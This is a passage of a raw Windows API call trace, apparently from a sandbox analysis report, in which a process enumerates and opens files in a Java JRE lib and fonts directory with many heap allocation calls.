cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 65 [0096.534] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.properties.src"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2948)) returned 1 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82838 | out: hHeap=0x20000) returned 1 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0096.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.534] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa122f229, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="fonts", cAlternateFileName="")) returned 1 [0096.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0096.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0096.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0096.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0096.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0096.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0096.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0096.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0096.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0096.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0096.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0096.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0096.535] AreFileApisANSI () returned 1 [0096.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts", lpUsedDefaultChar=0x0) returned 45 [0096.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0096.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.535] AreFileApisANSI () returned 1 [0096.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0096.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0096.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts") returned 45 [0096.535] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.536] GetLastError () returned 0x5 [0096.536] GetLastError () returned 0x5 [0096.536] SetLastError (dwErrCode=0x5) [0096.536] GetLastError () returned 0x5 [0096.536] SetLastError (dwErrCode=0x5) [0096.536] GetLastError () returned 0x5 [0096.536] SetLastError (dwErrCode=0x5) [0096.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0096.536] AreFileApisANSI () returned 1 [0096.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0096.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b68 [0096.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=45 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts") returned 45 [0096.536] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.536] GetLastError () returned 0x5 [0096.536] GetLastError () returned 0x5 [0096.536] SetLastError (dwErrCode=0x5) [0096.536] GetLastError () returned 0x5 [0096.536] SetLastError (dwErrCode=0x5) [0096.536] GetLastError () returned 0x5 [0096.536] SetLastError (dwErrCode=0x5) [0096.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0096.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a5b0 [0096.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0096.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0096.537] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x368a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="hijrah-config-umalqura.properties", cAlternateFileName="HIJRAH~1.PRO")) returned 1 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0096.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0096.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0096.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0096.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0096.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71620 [0096.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0096.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0096.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0096.537] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78290 [0096.783] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa122f229, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0096.783] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x12588, dwReserved0=0x0, dwReserved1=0x0, cFileName="LucidaBrightDemiBold.ttf", cAlternateFileName="LUCIDA~1.TTF")) returned 1 [0096.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0096.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0096.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e00 [0096.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0096.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0096.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0096.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0096.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0096.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0096.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0096.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0096.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x462e8 [0096.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0096.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0096.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0096.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0096.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0096.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0096.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0096.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0096.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0096.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0096.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0096.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0096.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0096.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0096.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0096.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0096.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0096.784] AreFileApisANSI () returned 1 [0096.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf", lpUsedDefaultChar=0x0) returned 70 [0096.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0096.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0096.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0096.862] AreFileApisANSI () returned 1 [0096.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0096.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8af48 [0096.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 70 [0096.863] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemibold.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.863] GetFileType (hFile=0x360) returned 0x1 [0096.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0096.863] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.863] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.863] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.864] CloseHandle (hObject=0x360) returned 1 [0096.864] AreFileApisANSI () returned 1 [0096.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0096.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8ab20 [0096.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 70 [0096.864] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemibold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.864] GetFileType (hFile=0x360) returned 0x1 [0096.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0096.864] CloseHandle (hObject=0x360) returned 1 [0096.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0096.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0096.865] AreFileApisANSI () returned 1 [0096.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0096.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8abb8 [0096.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 70 [0096.865] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemibold.ttf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, 